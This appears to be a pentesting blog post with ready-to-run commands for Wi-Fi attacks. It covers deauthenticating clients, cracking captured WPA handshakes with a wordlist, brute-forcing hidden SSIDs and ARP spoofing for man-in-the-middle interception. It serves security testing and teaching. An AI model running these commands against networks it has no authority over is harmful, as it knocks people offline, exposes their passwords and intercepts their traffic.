Home Pentesting Wireless
Post
Cancel

Pentesting Wireless

Check Available Interfaces Wi-Fi

Check the name of the available Wi-Fi interfaces by running:

1
ip link show

or

1
iwconfig

Monitor Mode

Monitor mode in Wi-Fi pentesting is a special configuration of a wireless network adapter that allows capturing and analyzing all network traffic on a specific channel without being associated with any particular Wi-Fi network. It is valuable for security analysis and auditing nearby wireless networks.

Set one of the Wi-Fi interface to monitor mode:

1
airmon-ng start <interface>

or

1
iwconfig <interface> mode monitor

Capture Traffic

Capture all traffic and list AP (Access Point) and clients:

1
airodump-ng <interfaceInModeMonitor> --band abg
  • The parameter “–band abg” is used to scan 2.4Ghz and 5Ghz.

The parameter “-c” is used to filter by channel or channels (for example 1 and 44). Example:

1
airodump-ng wlan0mon -c1,44

Deauthentication

Deauthentication in Wi-Fi pentesting is a technique used to forcefully disconnect a client device from a wireless network. It involves sending deauthentication frames to the target device, making it disassociate from the network and prompting it to reauthenticate.

It is useful for forcing clients to reauthenticate and obtain the handshake.

Disassociation packets are another type of management frame that is used to disconnect a node (meaning any device like a laptop or cell phone) from a nearby access point. The difference between deauthentication and disassociation frames is primarily the way they are used.

An AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area.

Interesting tools

Aireplay-ng:

Syntax:

1
aireplay-ng --deauth [NUM_PACKETS] -a [AP_MAC_ADDRESS] <interfaceInModeMonitor>

It can be done by other way.

Example:

1
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 wlan0
  • The parameter “-0” means deauthentication.
  • The next parameter is a number. 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously.
  • “-a 00:14:6C:7E:40:80” is the MAC address of the access point.
  • “-c 00:0F:B5:34:30:30” is the MAC address of the client to deauthenticate; if this is omitted then broadcast deauthentication is sent (not always work).
  • “wlan0” is the interface name.

Crack Handshake

Once the handshake is captured you can attempt to crack it.

Interesting Tools

aircrack-ng

Example:

1
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk.cap
  • The option “-b” is used to specify the MAC address of the access point (AP) whose key will be attempted to crack.

  • This represents the packet capture file. The command will attempt to use the file ‘/tmp/psk.cap’ to perform the cracking attack.

mdk4

Example:

1
mdk4 wlan0mon d -c 5 -b <victim_client_mac.txt> -E <WifiName> -B EF:60:69:D7:69:2F

You can attack all the clients in the network:

1
mdk4 wlan0mon d -E WifiName

Options:

  • “-c”: is the channel.
  • “-b”: this file contains the MAC address of the device to eliminate.
  • “-E”: is the name of the wifi.
  • “-B BSSID”: is the BSSID of the AP.

Hidden networks

Hidden networks, also known as closed networks, do not broadcast their Wi-Fi network name (SSID). To connect, clients need to know the SSID beforehand, but this provides only minimal security, as skilled attackers can still discover the hidden SSID through various techniques. Other security measures are necessary for effective protection.

If there are client, we can wait to a client connection to get the ESSID, but if there isn’t we can brute force probes to get the name with mdk4.

Example:

1
mdk4 wlan0mon p -t F0:9F:C2:71:22:11 -f ~/rockyou.txt

More info: https://github.com/koutto/pi-pwnbox-rogueap/wiki

ARP spoofing

It is interesting for MITM (Man In The Middle) attacks.

ARP spoofing is sending spoofed ARP messages to the Ethernet. Usually the purpose is to associate the attacker’s MAC address with the IP address of another node, such as the default gateway.

Enable port forwarding:

1
echo 1 > /proc/sys/net/ipv4/ip_forward

Command to view the ARP table:

1
arp -a

Install arpspoof:

1
sudo apt-get install dsniff

The following two commands must be executed at the same time:

1
arpspoof -i <WiFiInterface> -t <IProuter> <IPtarget>
1
arpspoof -i <WiFiInterface> -t <IPtarget> <IProuter>

If the ARP table is queried again, now the MAC of the attacker and of the router must be the same.

The victim will not realize that we are intercepting the requests between him and the router because we are redirecting the traffic.

To visualize the requests and responses, run a sniffer such as tcpdump or wireshark.

This post is licensed under CC BY 4.0 by the author.